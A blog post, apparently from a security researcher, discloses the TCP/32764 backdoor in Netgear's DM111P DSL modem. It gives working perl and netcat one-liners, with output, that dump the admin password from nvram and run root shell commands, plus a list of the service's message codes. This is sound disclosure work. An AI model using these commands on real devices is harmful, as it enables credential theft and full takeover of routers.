<h1>Netgear DM111P backdoor?</h1>
<p>Published 2013-12-31 (last modified 2014-01-05) at <a href="https://locallost.net/?p=1425">https://locallost.net/?p=1425</a>.</p>
<p>After reading <a href="https://twitter.com/elvanderb">@elvanderb</a>'s tweet about a <a href="https://twitter.com/elvanderb/status/418053373632323584">backdoor in his Linksys WAG200G</a>, I checked my Netgear DM111P DSL modem (running firmware <code>V2.00.27_WW</code>) and found that TCP/32764 was open and responding in a similar way.</p>
<p>The admin's HTTP password is also exposed in the clear through the <code>scfgmgr</code> process listening on TCP/32764:</p>
<pre><code># request header: magic 0x53634d4d ("MMcS"), message code 1 (get all nvram variables), payload length 0
# the reply is a NUL-separated list of nvram variables; the second perl turns each into its own line
$ perl -e 'print pack("(III)&lt;", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.0.1 32764 \
| perl -n0e 'chomp;print"$_\n"' \
| grep ^http_
</code></pre>
<p>Output:</p>
<pre><code>http_username=admin
http_password=***password*in*clear***
http_timeout=5
</code></pre>
<ul>
<li><a href="https://github.com/elvanderb/TCP-32764">https://github.com/elvanderb/TCP-32764</a></li>
</ul>
<p>More important is the ability to execute arbitrary shell commands as root (with a code 7 message)!</p>
<pre><code># request header: same magic, message code 7 (popen), payload length = length of the command string
$ perl -e '$c="ps";print pack("(III)&lt;", 0x53634d4d, 0x07, length($c)).$c' \
| nc 192.168.0.1 32764
MMcS?  
  PID  Uid        VSZ Stat Command
    1 root       1268 S   init       
    2 root            SW  [keventd]
    3 root            RWN [ksoftirqd_CPU0]
    4 root            SW  [kswapd]
    5 root            SW  [bdflush]
    6 root            SW  [kupdated]
    7 root            SW  [swapper]
    8 root            SW  [mtdblockd]
   55 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   56 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   57 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   65 root        628 S   /sbin/klogd 
  125 root       1148 S   dnrd -a 192.168.0.1 -m hosts -c off --timeout=0 -b 
  130 root        620 S   /usr/sbin/crond 
  131 root        652 S   /sbin/syslogd -f /etc/syslog.conf 
  133 root        868 S   /usr/sbin/scfgmgr 
  135 root        600 S   /usr/sbin/atm_monitor init 
  141 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
  142 root        596 S   /usr/sbin/cmd_agent_ap 
  143 root        596 S   /usr/sbin/pb_ap 
  137 root            SW  [autbtex]
  138 root            SW  [atm_led_complet]
  139 root            SW  [pmex_ne]
  140 root            SW  [pmex_fe]
  163 root       1268 S   init       
  165 root        672 S   /usr/sbin/mini_httpd -d /www -r NETGEAR DM111P  ADSL2
  228 root        612 S   /sbin/br2684ctld 
  755 root        996 S   /usr/sbin/scfgmgr 
  756 root       1268 S   sh -c ps 
  757 root       1272 R   ps
</code></pre>
<p>Further inspection:</p>
<ul>
<li>Download <a href="http://www.downloads.netgear.com/files/GDC/DM111Pv2/DM111Pv2%20Firmware%20Version%202.00.26%20(All%20regions%20except%20North%20America).zip">http://www.downloads.netgear.com/files/GDC/DM111Pv2/DM111Pv2%20Firmware%20Version%202.00.26%20(All%20regions%20except%20North%20America).zip</a> (the file is labeled with version <code>2.00.26</code> but contains version <code>2.00.27</code>).</li>
<li>Unpack the zip.</li>
<li>Follow the <a href="http://www.devttys0.com/2011/05/reverse-engineering-firmware-linksys-wag120n/">devttys0.com</a> instructions for extracting the squashfs image.</li>
<li>Disassemble <code>scfgmgr</code>.</li>
</ul>
<p>List of message codes for the DM111P:</p>
<ul>
<li><code>1</code>: Get all nvram variables (<code>open</code>/<code>lseek</code>/<code>read</code> on <code>/tmp/nvram</code>; contains PPPoE passwords, the HTTP admin password, etc.)</li>
<li><code>2</code>: Get a specific nvram variable (nvram_get)</li>
<li><code>3</code>: Set a specific nvram variable (parse the string with <code>strtok</code> and call nvram_set)</li>
<li><code>4</code>: Commit nvram variables (nvram_commit)</li>
<li><code>5</code>: Reset WAN mode? (nvram_set <code>wan_mode=bridge</code>, <code>wan_encap=0</code>, <code>wan_vpi=8</code>, <code>wan_vci=81</code>, and finally <code>/usr/sbin/rc wan restart&amp;</code>)</li>
<li><code>6</code>: Get ADSL (up|down)stream speed as <code>%dKbps/%dKbps</code> (<code>fopen</code>/<code>fscanf</code> on <code>/tmp/adsl/downstream</code> and <code>/tmp/adsl/upstream/</code>)</li>
<li><code>7</code>: Execute arbitrary commands through <code>popen</code>!!!</li>
<li><code>8</code>: Write content to a <code>/tmp/%s</code> file</li>
<li><code>9</code>: Get the version from <code>/etc/version</code></li>
<li><code>10</code>: Get the nvram value of the variable <code>lan_ipaddr</code></li>
<li><code>11</code>: Restore default nvram variables (nvram_set <code>restore_default=1</code>)</li>
<li><code>12</code>: <code>fopen</code>/<code>fseek</code>/<code>fread</code> on <code>/dev/mtdblock/5</code>?</li>
<li><code>13</code>: nvram_load followed by nvram_commit?</li>
<li><code>14</code>: Set firmware BOOT options? (execute <code>/usr/sbin/fw_env %s %s</code> through a <code>system</code> call)</li>
<li><code>20</code>: Get the WAN interface MAC address? (nvram_get <code>wan_macaddr_def</code>)</li>
</ul>
<p>Update:</p>
<ul>
<li>Here is my try at <a href="/?p=1450">recompiling a firmware with a neutralized <code>scfgmgr</code></a>.</li>
</ul>